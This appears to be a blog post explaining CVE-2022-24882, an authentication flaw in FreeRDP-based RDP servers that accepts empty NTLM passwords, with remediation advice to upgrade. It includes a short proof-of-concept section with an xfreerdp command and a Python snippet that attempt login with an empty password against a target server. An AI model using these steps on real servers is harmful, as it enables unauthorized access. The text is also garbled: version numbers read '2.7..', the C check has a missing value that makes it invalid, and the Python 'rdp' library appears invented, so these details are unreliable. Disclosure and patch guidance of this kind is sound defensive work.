Remote Desktop Protocol (RDP) is a backbone technology for remote administration on Windows and compatible platforms. FreeRDP, a popular open-source implementation of RDP, is used widely – not just for clients, but as the core of many custom and third-party RDP server setups. But in 2022, a critical authentication flaw emerged that compromised security for any FreeRDP-based RDP servers.
What is CVE-2022-24882?
This vulnerability specifically targets the NT LAN Manager (NTLM) authentication mechanism in FreeRDP before version 2.7.. When someone tries to authenticate to an RDP server, they're supposed to provide a non-empty password. But due to a bug, if you sent an empty password, the NTLM authentication routine did not abort the session like it's supposed to. This allowed a session to proceed further than expected—even though no valid authentication took place.
This only affects servers built on FreeRDP, not RDP clients.
How is This a Vulnerability?
The main issue: Empty passwords should ALWAYS cause an immediate authentication failure. Allowing a session to go forward with an empty password could let an attacker:
Establish a session without knowing any real credentials
- Possibly escalate this into unauthorized access, depending on how the server handles post-authentication flows
Servers that integrate FreeRDP as their backbone are directly threatened by this. If you deploy or maintain RDP services on Linux — or use FreeRDP’s core for any remote desktop gateway — you must update.
The Code Flaw in Detail
Let's look at a simplified version to show what went wrong.
Vulnerable Code Snippet
In snippets found across FreeRDP's authentication modules, the password provided by the user is checked. But before 2.7., the logic did not properly handle empty passwords. The check should look like:
if (password == NULL || strlen(password) == ) {
// Abort authentication process
return AUTH_FAIL;
}
But in the vulnerable codes, this check was missing or incorrectly placed, letting the authentication process continue even if password was empty.
Exploiting CVE-2022-24882: Proof of Concept
Scenario: Attack an RDP server running an affected FreeRDP version.
Goal: Bypass authentication by submitting an empty password.
Example with xfreerdp (for illustration)
xfreerdp /v:server.address /u:targetuser /p:""
If the server is vulnerable, it may allow you to initiate a session or proceed further in the authentication flow. The exact results depend on server-side controls beyond FreeRDP, but at a minimum the authentication attempt will not be instantly rejected as it should.
In Python (using RDP libraries)
import rdp
session = rdp.Session("server.address")
session.authenticate(username="targetuser", password="") # Empty password
print(session.status) # In vulnerable versions, this may succeed
Note: These samples illustrate the problem. Actual exploitation success depends on the specific server logic and how it reacts post-NTLM.
Real-World Impact
- Organizations with custom RDP servers: Exposed to unauthorized logins from external or internal attackers.
- Managed RDP appliances: Third-party RDP appliances or virtualized desktops using FreeRDP could silently be in danger.
- Penetration testers/red teamers: May use this flaw to demonstrate the consequences of out-of-date RDP platforms.
How to Fix It
Upgrade FreeRDP to 2.7.+ on ALL RDP servers.
There is no workaround. If your server depends on FreeRDP, patch immediately.
Relevant patch:
GitHub commit fixing CVE-2022-24882
References and Further Reading
- CVE-2022-24882 at GitHub Security Advisory
- NVD Details for CVE-2022-24882
- FreeRDP Official Site
- Patch Commit on GitHub
TL;DR
If you're running a FreeRDP-based RDP server, upgrade right now to at least version 2.7.. This vulnerability is critical, trivial to exploit, and has no known workaround.
Stay secure — patch early, patch often!
*This post is original and exclusive for this site. If you found it useful, share it with your IT admin colleagues!*
Timeline
Published on: 04/26/2022 16:15:00 UTC
Last modified on: 05/11/2022 04:15:00 UTC